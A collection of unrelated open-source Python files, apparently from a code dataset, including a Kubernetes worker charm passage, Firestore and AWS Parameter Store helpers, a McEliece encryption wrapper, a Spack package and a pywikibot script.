'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
@when_any('config.changed.default-backend-image',
'config.changed.nginx-image')
@when('kubernetes-worker.config.created')
def launch_default_ingress_controller():
''' Launch the Kubernetes ingress controller & default backend (404) '''
config = hookenv.config()
# need to test this in case we get in
# here from a config change to the image
if not config.get('ingress'):
return
context = {}
context['arch'] = arch()
addon_path = '/root/cdk/addons/{}'
context['defaultbackend_image'] = config.get('default-backend-image')
if (context['defaultbackend_image'] == "" or
context['defaultbackend_image'] == "auto"):
if context['arch'] == 's390x':
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend-s390x:1.4"
else:
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend:1.4"
# Render the default http backend (404) replicationcontroller manifest
manifest = addon_path.format('default-http-backend.yaml')
render('default-http-backend.yaml', manifest, context)
hookenv.log('Creating the default http backend.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
# Render the ingress daemon set controller manifest
context['ingress_image'] = config.get('nginx-image')
if context['ingress_image'] == "" or context['ingress_image'] == "auto":
if context['arch'] == 's390x':
context['ingress_image'] = \
"docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13"
else:
context['ingress_image'] = \
"gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.15" # noqa
context['juju_application'] = hookenv.service_name()
manifest = addon_path.format('ingress-daemon-set.yaml')
render('ingress-daemon-set.yaml', manifest, context)
hookenv.log('Creating the ingress daemon set.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
set_state('kubernetes-worker.ingress.available')
hookenv.open_port(80)
hookenv.open_port(443)
def restart_unit_services():
'''Restart worker services.'''
hookenv.log('Restarting kubelet and kube-proxy.')
services = ['kube-proxy', 'kubelet']
for service in services:
service_restart('snap.%s.daemon' % service)
def get_kube_api_servers(kube_api):
'''Return the kubernetes api server address and port for this
relationship.'''
hosts = []
# Iterate over every service from the relation object.
for service in kube_api.services():
for unit in service['hosts']:
hosts.append('https://{0}:{1}'.format(unit['hostname'],
unit['port']))
return hosts
def kubectl(*args):
''' Run a kubectl cli command with a config file. Returns stdout and throws
an error if the command fails. '''
command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args)
hookenv.log('Executing {}'.format(command))
return check_output(command)
def kubectl_success(*args):
    ''' Runs kubectl with the given args. Returns True if successful, False if
not. '''
try:
kubectl(*args)
return True
except CalledProcessError:
return False
def kubectl_manifest(operation, manifest):
''' Wrap the kubectl creation command when using filepath resources
:param operation - one of get, create, delete, replace
:param manifest - filepath to the manifest
'''
# Deletions are a special case
if operation == 'delete':
# Ensure we immediately remove requested resources with --now
return kubectl_success(operation, '-f', manifest, '--now')
else:
# Guard against an error re-creating the same manifest multiple times
if operation == 'create':
            # If we already have the definition, it's probably safe to assume
# creation was true.
if kubectl_success('get', '-f', manifest):
hookenv.log('Skipping definition for {}'.format(manifest))
return True
# Execute the requested command that did not match any of the special
# cases above
return kubectl_success(operation, '-f', manifest)
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-worker.config.created')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
    # The current nrpe-external-master interface doesn't handle a lot of logic;
    # use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def set_privileged():
"""Update the allow-privileged flag for kubelet.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
gpu_enabled = is_state('kubernetes-worker.gpu.enabled')
privileged = 'true' if gpu_enabled else 'false'
if privileged == 'true':
set_state('kubernetes-worker.privileged')
else:
remove_state('kubernetes-worker.privileged')
@when('config.changed.allow-privileged')
@when('kubernetes-worker.config.created')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
set_state('kubernetes-worker.restart-needed')
remove_state('config.changed.allow-privileged')
@when('cuda.installed')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.gpu.enabled')
def enable_gpu():
"""Enable GPU usage on this node.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
hookenv.log('Enabling gpu mode')
try:
# Not sure why this is necessary, but if you don't run this, k8s will
# think that the node has 0 gpus (as shown by the output of
        # `kubectl get nodes -o yaml`)
check_call(['nvidia-smi'])
except CalledProcessError as cpe:
hookenv.log('Unable to communicate with the NVIDIA driver.')
hookenv.log(cpe)
return
# Apply node labels
_apply_node_label('gpu=true', overwrite=True)
_apply_node_label('cuda=true', overwrite=True)
set_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when_not('kubernetes-worker.privileged')
@when_not('kubernetes-worker.restart-needed')
def disable_gpu():
"""Disable GPU usage on this node.
This handler fires when we're running in gpu mode, and then the operator
sets allow-privileged="false". Since we can no longer run privileged
containers, we need to disable gpu mode.
"""
hookenv.log('Disabling gpu mode')
# Remove node labels
_apply_node_label('gpu', delete=True)
_apply_node_label('cuda', delete=True)
remove_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_enabled(kube_control):
"""Notify kubernetes-master that we're gpu-enabled.
"""
kube_control.set_gpu(True)
@when_not('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_not_enabled(kube_control):
"""Notify kubernetes-master that we're not gpu-enabled.
"""
kube_control.set_gpu(False)
@when('kube-control.connected')
def request_kubelet_and_proxy_credentials(kube_control):
""" Request kubelet node authorization with a well formed kubelet user.
This also implies that we are requesting kube-proxy auth. """
    # The kube-control interface is created to support RBAC.
# At this point we might as well do the right thing and return the hostname
# even if it will only be used when we enable RBAC
nodeuser = 'system:node:{}'.format(gethostname().lower())
kube_control.set_auth_request(nodeuser)
@when('kube-control.connected')
def catch_change_in_creds(kube_control):
"""Request a service restart in case credential updates were detected."""
nodeuser = 'system:node:{}'.format(gethostname().lower())
creds = kube_control.get_auth_credentials(nodeuser)
if creds \
and data_changed('kube-control.creds', creds) \
and creds['user'] == nodeuser:
# We need to cache the credentials here because if the
# master changes (master leader dies and replaced by a new one)
# the new master will have no recollection of our certs.
db.set('credentials', creds)
set_state('worker.auth.bootstrapped')
set_state('kubernetes-worker.restart-needed')
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator they need to add the kube-control relation.
    If deploying via bundle this won't happen, but if the operator is upgrading
    a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set(
'blocked',
'Relate {}:kube-control kubernetes-master:kube-control'.format(
hookenv.service_name()))
@when('docker.ready')
def fix_iptables_for_docker_1_13():
""" Fix iptables FORWARD policy for Docker >=1.13
https://github.com/kubernetes/kubernetes/issues/40182
https://github.com/kubernetes/kubernetes/issues/39823
"""
cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT']
check_call(cmd)
def _systemctl_is_active(application):
''' Poll systemctl to determine if the application is running '''
cmd = ['systemctl', 'is-active', application]
try:
raw = check_output(cmd)
return b'active' in raw
except Exception:
return False
class GetNodeNameFailed(Exception):
pass
def get_node_name():
# Get all the nodes in the cluster
cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
try:
raw = check_output(cmd)
break
except CalledProcessError:
hookenv.log('Failed to get node name for node %s.'
' Will retry.' % (gethostname()))
time.sleep(1)
else:
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
result = json.loads(raw.decode('utf-8'))
if 'items' in result:
for node in result['items']:
if 'status' not in node:
continue
if 'addresses' not in node['status']:
continue
# find the hostname
for address in node['status']['addresses']:
if address['type'] == 'Hostname':
if address['address'] == gethostname():
return node['metadata']['name']
# if we didn't match, just bail to the next node
break
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
class ApplyNodeLabelFailed(Exception):
pass
def _apply_node_label(label, delete=False, overwrite=False):
''' Invoke kubectl to apply node label changes '''
nodename = get_node_name()
# TODO: Make this part of the kubectl calls instead of a special string
cmd_base = 'kubectl --kubeconfig={0} label node {1} {2}'
if delete is True:
label_key = label.split('=')[0]
cmd = cmd_base.format(kubeconfig_path, nodename, label_key)
cmd = cmd + '-'
else:
cmd = cmd_base.format(kubeconfig_path, nodename, label)
if overwrite:
cmd = '{} --overwrite'.format(cmd)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
code = subprocess.call(cmd)
if code == 0:
break
hookenv.log('Failed to apply label %s, exit code %d. Will retry.' % (
label, code))
time.sleep(1)
else:
msg = 'Failed to apply label %s' % label
raise ApplyNodeLabelFailed(msg)
def _parse_labels(labels):
''' Parse labels from a key=value string separated by space.'''
label_array = labels.split(' ')
sanitized_labels = []
for item in label_array:
if '=' in item:
sanitized_labels.append(item)
else:
hookenv.log('Skipping malformed option: {}'.format(item))
return sanitized_labels
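# Illustrative example (not part of the original charm): well-formed tokens pass
# through unchanged, e.g. _parse_labels('foo=bar zone=us-east-1a') returns
# ['foo=bar', 'zone=us-east-1a']; tokens without '=' are logged and skipped.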
|
py | 1a4fa37a55fa187c82bf5bf2a9c7821a8be7b902 | '''
Televisao (Television) class
Attributes:
    -> canal (channel) = None
    -> volume = 0
Methods:
    aumentar_volume: increases the volume by 1 unit
    diminuir_volume: decreases the volume by 1 unit
    alterar_canal(canal): changes the channel
'''
class Televisao:
def __init__(self):
self.canal = None
self.volume = 0
def aumentar_volume(self):
self.volume += 1
def diminuir_volume(self):
self.volume -= 1
def alterar_canal(self, canal):
self.canal = canal
# create the object
tv = Televisao()
tv.aumentar_volume()
tv.aumentar_volume()
tv.aumentar_volume()
tv.diminuir_volume()
tv.alterar_canal(5)
tv.alterar_canal(11)
print("Volume é:", tv.volume)
print("canal é:", tv.canal)
|
py | 1a4fa3a655ff2bbdbe054062b60086bb637480bb | from enum import Enum
class GenomeBuild(Enum):
GRCH37 = 0
GRCH38 = 1
MM9 = 2
MM10 = 3
RN6 = 4
@staticmethod
def parse(s: str) -> "GenomeBuild":
if s == "GRCh37":
return GenomeBuild.GRCH37
elif s == "GRCh38":
return GenomeBuild.GRCH38
elif s == "mm9":
return GenomeBuild.MM9
elif s == "mm10":
return GenomeBuild.MM10
elif s == "rn6":
return GenomeBuild.RN6
else:
raise ValueError("invalid genome build: '{}'".format(s))
def __str__(self) -> str:
if self == GenomeBuild.GRCH37:
return "GRCh37"
elif self == GenomeBuild.GRCH38:
return "GRCh38"
elif self == GenomeBuild.MM9:
return "mm9"
elif self == GenomeBuild.MM10:
return "mm10"
elif self == GenomeBuild.RN6:
return "rn6"
else:
raise ValueError("unreachable")
|
py | 1a4fa40ac129a51e7ea9d5173b15cb9d29dc7804 | import os
import cv2
import numpy as np
import tqdm
from common import my_utils
def improve_depth(image, depth, threshold=0.001, threshold_faraway_planes=False):
window_size = 20
width = image.shape[0]
height = image.shape[1]
if threshold_faraway_planes:
# NOTE: This could be PERHAPS useful for cases where the depth map is really bad / inexistent
# for faraway planes; unchanging neighborhood in depth image sometimes means no data which,
# generally, means too close or too far for measurement; this is dangerous and should probably be done offline
for i in range(0, width - window_size, window_size // 5):
for j in range(0, height - window_size, window_size // 5):
patch = image[i:i + window_size, j:j + window_size]
if np.std(patch) < threshold:
depth[i:i + window_size, j:j + window_size] = 300
depth = cv2.GaussianBlur(depth, (7, 7), 1)
return depth
def process_all(images_path, depth_path, output_path):
img_names = my_utils.os_listdir(images_path)
depth_names = my_utils.os_listdir(depth_path)
beta = 0
pbar = tqdm.tqdm(total=len(img_names))
for name_file, depth_file in zip(img_names, depth_names):
pbar.update(1)
img = cv2.imread(os.path.join(images_path, name_file))
        # cv2.imread returns a 3-channel BGR image by default, so convert with BGR2GRAY
        gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# divided by 256 to convert it into metres
original_depth = cv2.imread(os.path.join(depth_path, depth_file), cv2.IMREAD_UNCHANGED) / 256
smooth_depth = improve_depth(gray_img, original_depth, threshold=beta)
np.save(os.path.join(output_path, name_file), smooth_depth)
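# Illustrative sketch (not part of the original module): the directory names below
# are placeholders; the real pipeline presumably supplies its own paths.
if __name__ == '__main__':
    process_all('data/images', 'data/depth', 'data/depth_smoothed')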
|
py | 1a4fa605a0deb35d41ce025ea87d27aa44f6792d | from fireo.fields import ReferenceField, NestedModel, IDField
from fireo.queries import errors
from fireo.utils import utils
from google.cloud import firestore
class ModelWrapper:
"""Convert query result into Model instance"""
@classmethod
def from_query_result(cls, model, doc, nested_doc=False):
parent_key = None
if nested_doc:
doc_dict = doc
elif doc:
parent_key = utils.get_parent_doc(doc.reference.path)
if doc.to_dict() is not None:
doc_dict = doc.to_dict()
else:
return None
else:
return None
# instance values is changed according to firestore
# so mark it modified this will help later for figuring
# out the updated fields when need to update this document
setattr(model, '_instance_modified', True)
for k, v in doc_dict.items():
field = model._meta.get_field_by_column_name(k)
# if missing field setting is set to "ignore" then
# get_field_by_column_name return None So, just skip this field
if field is None:
continue
# Check if it is Reference field
if isinstance(field, ReferenceField):
val = ReferenceFieldWrapper.from_doc_ref(model, field, field.field_value(v))
elif isinstance(field, NestedModel):
nested_doc_val = field.field_value(v)
if nested_doc_val:
val = NestedModelWrapper.from_model_dict(field, nested_doc_val)
else:
val = None
else:
val = field.field_value(v)
setattr(model, field.name, val)
# If parent key is None but here is parent key from doc then set the parent for this model
# This is case when you filter the documents parent key not auto set just set it
if not model.parent and parent_key is not None:
model.parent = parent_key
# If it is not nested model then set the id for this model
if not nested_doc:
# When getting document attach the IDField if there is no user specify
# it will prevent to generate new id everytime when document save
# For more information see issue #45 https://github.com/octabytes/FireO/issues/45
if model._meta.id is None:
model._meta.id = ('id', IDField())
setattr(model, '_id', doc.id)
# save the firestore reference doc so that further actions can be performed (i.e. collections())
model._meta.set_reference_doc(doc.reference)
# even though doc.reference currently points to self, there is no guarantee this will be true
# in the future, therefore we should store the create time and update time separate.
model._meta._firestore_create_time = doc.create_time
model._meta._firestore_update_time = doc.update_time
return model
class NestedModelWrapper:
"""Get nested document"""
@classmethod
def from_model_dict(cls, field, doc):
model = field.nested_model()
return ModelWrapper.from_query_result(model, doc, nested_doc=True)
class ReferenceFieldWrapper:
"""Get reference documents
If auto_load is True then load the document otherwise return `ReferenceDocLoader` object and later user can use
`get()` method to retrieve the document
"""
@classmethod
def from_doc_ref(cls, parent_model, field, ref):
if not ref:
return None
ref_doc = ReferenceDocLoader(parent_model, field, ref)
if field.auto_load:
return ref_doc.get()
return ref_doc
class ReferenceDocLoader:
"""Get reference doc and Convert into model instance"""
def __init__(self, parent_model, field, ref):
self.parent_model = parent_model
self.field = field
self.ref = ref
def get(self):
doc = self.ref.get()
if not doc.exists:
raise errors.ReferenceDocNotExist(f'{self.field.model_ref.collection_name}/{self.ref.id} not exist')
model = ModelWrapper.from_query_result(self.field.model_ref(), doc)
# if on_load method is defined then call it
if self.field.on_load:
method_name = self.field.on_load
getattr(self.parent_model, method_name)(model)
return model
|
py | 1a4fa6679bbff9a96aa4c639ac3d1bd583f5839b | # -*- coding: utf-8 -*-
# Copyright: 2009 Nadia Alramli
# License: BSD
"""Draws an animated terminal progress bar
Usage:
p = ProgressBar("blue")
p.render(percentage, message)
"""
import terminal
import sys
class ProgressBar(object):
"""Terminal progress bar class"""
TEMPLATE = (
'%(percent)-2s%% %(color)s%(progress)s%(normal)s%(empty)s %(message)s\n'
)
PADDING = 7
def __init__(self, color=None, width=None, block='█', empty=' '):
"""
color -- color name (BLUE GREEN CYAN RED MAGENTA YELLOW WHITE BLACK)
        width -- bar width (optional)
block -- progress display character (default '█')
empty -- bar display character (default ' ')
"""
if color:
self.color = getattr(terminal, color.upper())
else:
self.color = ''
if width and width < terminal.COLUMNS - self.PADDING:
self.width = width
else:
# Adjust to the width of the terminal
self.width = terminal.COLUMNS - self.PADDING
self.block = block
self.empty = empty
self.progress = None
self.lines = 0
def render(self, percent, message = ''):
"""Print the progress bar
percent -- the progress percentage %
message -- message string (optional)
"""
inline_msg_len = 0
if message:
# The length of the first line in the message
inline_msg_len = len(message.splitlines()[0])
if inline_msg_len + self.width + self.PADDING > terminal.COLUMNS:
# The message is too long to fit in one line.
# Adjust the bar width to fit.
            bar_width = terminal.COLUMNS - inline_msg_len - self.PADDING
else:
bar_width = self.width
        # If render has been called before, clear the previously printed lines
        if self.progress is not None:
            self.clear()
        self.progress = int(bar_width * percent) // 100
data = self.TEMPLATE % {
'percent': percent,
'color': self.color,
'progress': self.block * self.progress,
'normal': terminal.NORMAL,
'empty': self.empty * (bar_width - self.progress),
'message': message
}
sys.stdout.write(data)
sys.stdout.flush()
# The number of lines printed
self.lines = len(data.splitlines())
def clear(self):
"""Clear all printed lines"""
sys.stdout.write(
self.lines * (terminal.UP + terminal.BOL + terminal.CLEAR_EOL)
)
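# ---------------------------------------------------------------------------
# Minimal demo (added; not part of the original module). It assumes the
# companion `terminal` module imported above provides COLUMNS, NORMAL, UP,
# BOL and CLEAR_EOL as used by this class.
if __name__ == '__main__':
    import time
    bar = ProgressBar('green', width=40)
    for pct in range(0, 101, 10):
        bar.render(pct, 'processing step %d of 10' % (pct // 10))
        time.sleep(0.1)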
|
py | 1a4fa7619b32b3a0fd27f30d4f5925cc74dd1840 | from ui import UiFrame, Vect
class UiWifi(UiFrame):
def __init__(self, ofs, dim, hotspot):
super().__init__(ofs, dim)
self.hotspot = hotspot
def draw(self, ui, d):
ui.text(10, 'SSID:', Vect(0, 5))
ui.text(10, self.hotspot.ssid, Vect(30, 20))
ui.text(10, 'Password:', Vect(0, 35))
ui.text(10, self.hotspot.passwd, Vect(30, 50))
|
py | 1a4fa792fe1d594ca202ff924064c5eb779a8404 | """
Author : James McKain (@jjmckain)
Created : 2021-12-10
SCM Repo : https://github.com/Preocts/secretbox
"""
from __future__ import annotations
import logging
from typing import Any
from secretbox.aws_loader import AWSLoader
try:
import boto3
from botocore.exceptions import ClientError
except ImportError:
boto3 = None
try:
from mypy_boto3_ssm.client import SSMClient
except ImportError:
SSMClient = None
class AWSParameterStore(AWSLoader):
"""Load secrets from an AWS Parameter Store"""
def load_values(self, **kwargs: Any) -> bool:
"""
Load all secrets from AWS parameter store
Requires `aws_sstore_name` and `aws_region_name` keywords to be
provided or for those values to be in the environment variables
under `AWS_SSTORE_NAME` and `AWS_REGION_NAME`.
`aws_sstore_name` is the parameter name or prefix.
"""
if boto3 is None:
self.logger.debug("Skipping AWS loader, boto3 is not available.")
return False
self.populate_region_store_names(**kwargs)
if self.aws_sstore is None:
self.logger.warning("Missing parameter name")
return True # this isn't a failure on our part
aws_client = self.get_aws_client()
if aws_client is None:
self.logger.error("Invalid SSM client")
return False
# if the prefix contains forward slashes treat the last token as the key name
do_split = "/" in self.aws_sstore
try:
# ensure the http client doesn't write our sensitive payload to the logger
logging.getLogger("botocore.parsers").addFilter(self.secrets_filter)
args = {
"Path": self.aws_sstore,
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
}
# loop through next page tokens, page size caps at 10
while True:
resp = aws_client.get_parameters_by_path(**args)
for param in resp["Parameters"] or []:
# remove the prefix
# we want /path/to/DB_PASSWORD to populate os.env.DB_PASSWORD
key = param["Name"].split("/")[-1] if do_split else param["Name"]
self.loaded_values[key] = param["Value"]
args["NextToken"] = resp.get("NextToken")
if not args["NextToken"]:
break
self.logger.debug("fetching next page: %s", args["NextToken"])
except ClientError as err:
self.log_aws_error(err)
return False
finally:
# remove our logging filter
logging.getLogger("botocore.parsers").removeFilter(self.secrets_filter)
self.logger.info(
"loaded %d parameters matching %s", len(self.loaded_values), self.aws_sstore
)
return True
def get_aws_client(self) -> SSMClient | None:
"""Make the connection"""
if self.aws_region is None:
self.logger.debug("Missing AWS region, cannot create client")
return None
return boto3.client(
service_name="ssm",
region_name=self.aws_region,
)
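# ---------------------------------------------------------------------------
# Hedged usage sketch (added; not part of the original module). It assumes
# valid AWS credentials in the environment and that AWSLoader's constructor
# takes no required arguments; the parameter path "/myapp/prod" is purely
# illustrative.
#
#   loader = AWSParameterStore()
#   loaded = loader.load_values(
#       aws_sstore_name="/myapp/prod",
#       aws_region_name="us-east-1",
#   )
#   if loaded:
#       # e.g. /myapp/prod/DB_PASSWORD is exposed under the key "DB_PASSWORD"
#       print(sorted(loader.loaded_values))
# ---------------------------------------------------------------------------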
|
py | 1a4fa7be3507b40bb7bb85b7b1355ac13487a22d | import ctypes
from ctypes import c_int
from .lib import libmcleece
class PublicKey:
def __init__(self, data):
        # TODO: check that the data length matches libmcleece's public key size
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_PUBLIC_KEY_SIZE').value
class PrivateKey:
def __init__(self, data):
        # TODO: check that the data length matches libmcleece's secret key size
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SECRET_KEY_SIZE').value
@classmethod
def generate(cls):
pk_size = PublicKey.size()
sk_size = cls.size()
pk = (ctypes.c_uint8 * pk_size)()
sk = (ctypes.c_uint8 * sk_size)()
res = libmcleece().mcleece_crypto_box_keypair(ctypes.byref(pk), ctypes.byref(sk))
if res != 0:
return None
return PrivateKey(bytes(sk)), PublicKey(bytes(pk))
def get_nacl_public_key(self):
# truncate a copy of self.data, and pass to PrivateKey here...
from nacl.public import PrivateKey as nacl_PrivateKey
sodium_pkey_size = c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SODIUM_PUBLIC_KEY_SIZE').value
return bytes(nacl_PrivateKey(self.data[:sodium_pkey_size]).public_key)
class SealedBox:
def __init__(self, key):
''' do something with the key here...
the decryption part is interesting, because libsodium needs both public+private keys
to do the decryption, but mcleece doesn't care about needing the public key.
But the *interface* doesn't have a good way to communicate that at the moment...
'''
self.public_key = self.secret_key = None
if isinstance(key, PublicKey):
self.public_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
elif isinstance(key, PrivateKey):
self.secret_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
pubkey = key.get_nacl_public_key()
self.public_key = (ctypes.c_uint8 * len(pubkey)).from_buffer_copy(pubkey)
@classmethod
def message_header_size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_MESSAGE_HEADER_SIZE').value
def encrypt(self, msg):
if not self.public_key or len(self.public_key) < PublicKey.size():
raise Exception('not initialized for encryption!')
msg_size = len(msg)
msg = (ctypes.c_uint8 * msg_size).from_buffer_copy(msg)
ciphertext_size = msg_size + self.message_header_size()
ciphertext = (ctypes.c_uint8 * ciphertext_size)()
res = libmcleece().mcleece_crypto_box_seal(
ctypes.byref(ciphertext), ctypes.byref(msg), ctypes.c_uint32(msg_size), ctypes.byref(self.public_key)
)
if res != 0:
return None
return bytes(bytearray(ciphertext))
def decrypt(self, ciphertext):
if not self.secret_key or len(self.secret_key) < PrivateKey.size():
raise Exception('not initialized for decryption!')
ciphertext_size = len(ciphertext)
ciphertext = (ctypes.c_uint8 * ciphertext_size).from_buffer_copy(ciphertext)
msg_size = ciphertext_size - self.message_header_size()
msg = (ctypes.c_uint8 * msg_size)()
res = libmcleece().mcleece_crypto_box_seal_open(
ctypes.byref(msg), ctypes.byref(ciphertext), ctypes.c_uint32(ciphertext_size),
ctypes.byref(self.public_key), ctypes.byref(self.secret_key)
)
if res != 0:
return None
return bytes(bytearray(msg))
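# ---------------------------------------------------------------------------
# Round-trip demo (added; not part of the original module). It only exercises
# the classes defined above, and assumes the native libmcleece shared library
# is loadable and that PyNaCl is installed (SealedBox(PrivateKey) re-derives
# the sodium public key via get_nacl_public_key).
if __name__ == '__main__':
    keys = PrivateKey.generate()
    if keys is not None:
        secret_key, public_key = keys
        sealed = SealedBox(public_key).encrypt(b'attack at dawn')
        if sealed is not None:
            opened = SealedBox(secret_key).decrypt(sealed)
            print('sealed box round trip ok:', opened == b'attack at dawn')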
|
py | 1a4fa7f44a6847a924892d65d48eae36d78993e7 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyTypingExtensions(PythonPackage):
"""The typing_extensions module contains both backports of these
changes as well as experimental types that will eventually be
added to the typing module, such as Protocol (see PEP 544 for
details about protocols and static duck typing)."""
homepage = "https://github.com/python/typing/tree/master/typing_extensions"
pypi = "typing_extensions/typing_extensions-3.7.4.tar.gz"
version('3.10.0.2', sha256='49f75d16ff11f1cd258e1b988ccff82a3ca5570217d7ad8c5f48205dd99a677e')
version('3.10.0.0', sha256='50b6f157849174217d0656f99dc82fe932884fb250826c18350e159ec6cdf342')
version('3.7.4.3', sha256='99d4073b617d30288f569d3f13d2bd7548c3a7e4c8de87db09a9d29bb3a4a60c')
version('3.7.4', sha256='2ed632b30bb54fc3941c382decfd0ee4148f5c591651c9272473fea2c6397d95')
version('3.7.2', sha256='fb2cd053238d33a8ec939190f30cfd736c00653a85a2919415cecf7dc3d9da71')
version('3.6.6', sha256='51e7b7f3dcabf9ad22eed61490f3b8d23d9922af400fe6656cb08e66656b701f')
depends_on('[email protected]:2.8,3.4:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', when='@3.7: ^python@:3.4', type=('build', 'run'))
depends_on('[email protected]:', when='^python@:3.4', type=('build', 'run'))
|
py | 1a4fa9ae84bf92f4c60f61a21f0b3c883333645e | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Manage featured/good article/list status template.
*** This script understands various command-line arguments: ***
Task commands:
-featured use this script for featured articles. Default task
if no task command is specified
-good use this script for good articles.
-lists use this script for featured lists.
-former use this script for removing {{Link FA|xx}} from former
                 featured articles
NOTE: you may have all of these commands in one run
Option commands:
-interactive: ask before changing each page
-nocache         doesn't use the cache file that remembers whether an article
                 was already verified.
-nocache:xx,yy you may ignore language codes xx,yy,... from cache file
-fromlang:xx,yy xx,yy,zz,.. are the languages to be verified.
-fromlang:ar--fi Alternatively, a range of languages may be given
-fromall to verify all languages.
-tolang:xx,yy xx,yy,zz,.. are the languages to be updated
-after:zzzz process pages after and including page zzzz
(sorry, not implemented yet)
-side use -side if you want to move all {{Link FA|lang}} next
to the corresponding interwiki links. Default is placing
{{Link FA|lang}} on top of the interwiki links.
(This option is deprecated with wikidata)
-count Only counts how many featured/good articles exist
                 on all wikis (when using the "-fromall" argument) or
                 on several languages (given with the "-fromlang" argument).
Example: python pwb.py featured -fromlang:en,he -count
counts how many featured articles exist in the en and he
wikipedias.
-quiet no corresponding pages are displayed.
"""
#
# (C) Maxim Razin, 2005
# (C) Leonardo Gregianin, 2005-2008
# (C) xqt, 2009-2019
# (C) Pywikibot team, 2005-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import pickle
import re
import pywikibot
from pywikibot import i18n, textlib, config
from pywikibot.pagegenerators import PreloadingGenerator
from pywikibot.tools.formatter import color_format
from pywikibot.tools import issue_deprecation_warning, PY2
if not PY2:
unichr = chr
def CAT(site, name, hide):
name = site.namespace(14) + ':' + name
cat = pywikibot.Category(site, name)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startFrom=unichr(ord(hide) + 1)):
yield article
def BACK(site, name, hide): # pylint: disable=unused-argument
p = pywikibot.Page(site, name, ns=10)
return [page for page in p.getReferences(follow_redirects=False,
only_template_inclusion=True)]
def DATA(site, name, hide):
dp = pywikibot.ItemPage(site.data_repository(), name)
try:
title = dp.getSitelink(site)
except pywikibot.NoPage:
return
cat = pywikibot.Category(site, title)
if isinstance(hide, dict):
hide = hide.get(site.code)
